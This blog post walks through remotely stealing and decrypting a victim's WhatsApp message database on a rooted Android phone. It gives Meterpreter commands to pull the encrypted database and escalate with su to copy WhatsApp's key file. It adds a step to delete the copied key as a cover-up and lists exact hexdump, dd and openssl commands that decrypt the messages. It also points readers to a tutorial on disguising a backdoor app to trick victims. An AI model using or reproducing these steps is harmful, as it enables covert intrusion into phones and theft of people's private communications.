How to Hack and Decrypt WhatsApp Database on rooted devices

Share this…

The post includes a detailed procedure to hack and decrypt WhatsApp Database remotely on rooted Android mobile devices. Very Interesting!.

A few hours ago it has been published an interesting post on “How to Hack and Decrypt WhatsApp Database (Remotely) [ROOT]” that explains how to extract and decrypt WhatsApp database from a rooted Android system.

Despite WhatsApp is considerable very secure, the practice of rooting the Android device could expose ‘experienced users’ to risks of attack.

Let’s see step by step the attack scenario proposed by author that uses the pseudonymous of F.E.A.R.

Step 1: Exploit and Gain Access to the Android!

As explained in this guide, this phase is quite simple if the Android device is rooted by using the Meterpeter commands-

root

handle

In order to Hack and Decrypt WhatsApp database the attacker need a key file that is present in the data folder, the only way to access it is having the root privileges.  The key file is indispensable to decrypt the WhatsApp database

Step 2: Download the Database

Use the following sequence of command to download the database via Meterpreter:

cd /
cd /sdcard/WhatsApp
ls (Print the current directory)
cd Databases
download msgstore.db.crypt8 (This will take time, maybe a LOT)

meterpreter

Step 3: Extract the Decryption Keys:

The key file necessary to decrypt the WhatsApp database stores two sets of decryption keys, the actual encryption key, K and an initialization vector called IV. WhatsApp key file is stored in a secure location.

These are the commands to extract the key file:

shell
su (For Super User access or simply escalating privileges)


As explained by F.E.A.R. this is the most difficult part, especially if the target is experienced and skilled users, because he must have installed the SuperSU application.

How to convince victims to install it?

Give a look to this tutorial published by the user bart that explains how to disguise a back-door application. The things go better is the victim is an inexperienced and unskilled users in the following cases:

  • They don’t have a SuperSU application installed.
  • They have not changed the setting for newly installed apps to PROMPT instead of GRANT.

Execute the following commands to access the key folder and extract the decryption key.

cd /
cd /data/data
ls
cd com.whatsapp ls
cd files
ls cp key /sdcard/Download (Means copy the file ‘key’ to sdcard>Download folder)

Step 4: Download the decryption key file in the root directory:

Download the extracted key file to the root directory that contains also the encrypted WhatsApp database:
cd /
cd /sdcard/Download
download key
rm key (Make sure you do that to delete the key file)


Step 5: Decrypt WhatsApp database!

The post reports 2 different methods to Decrypt WhatsApp:

#1 Using Linux Commands:Copy and Paste the commands one at a time, don’t make a a script out of it, or it will not work:

hexdump -e '2/1 "%02x"' key | cut -b 253-316 > aes.txt
hexdump -n 67 -e '2/1 "%02x"' msgstore.db.crypt8 | cut -b 103-134 > iv.txt
dd if=msgstore.db.crypt8 of=msgstore.db.crypt8.nohdr ibs=67 skip=1
openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K $(cat aes.txt) -iv $(cat iv.txt) > msgstore.gz
gzip -cdq msgstore.gz > msgstore.db

In case the 4th command does not work, follow:

  • hexdump -e ‘2/1 “%02x”‘ key | cut -b 253-316

(Copy the printed text)

  • hexdump -n 67 -e ‘2/1 “%02x”‘ msgstore.db.crypt8 | cut -b 103-134

(Copy the printed text)

  • openssl enc -aes-256-cbc -d -nosalt -nopad -bufsize 16384 -in msgstore.db.crypt8.nohdr -K(Paste text from 1st command) -iv (Paste text from 2nd command) > msgstore.gz

For the second method based on the Simple Windows WhatsApp Viewer Application give a look to the original post.